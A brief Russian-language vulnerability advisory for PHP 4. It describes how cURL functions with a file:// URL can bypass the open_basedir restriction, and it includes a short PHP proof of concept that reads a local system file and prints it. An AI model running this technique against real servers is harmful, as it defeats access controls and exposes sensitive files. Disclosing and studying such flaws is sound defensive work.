Программа: PHP 4
Обнаружена уязвимость в функции cURL в PHP. Злонамеренный сценарий может обойти ограничения
'open_basedir'. Локальный атакующий может обойти ограничения 'open_basedir' в файле php.ini с помощью функций cURL (libcurl) и получить доступ к важным файлам на системе.
Пример:
<?php
$ch = curl_init("file:///etc/parla");
$file=curl_exec($ch) ;
echo $file
?>
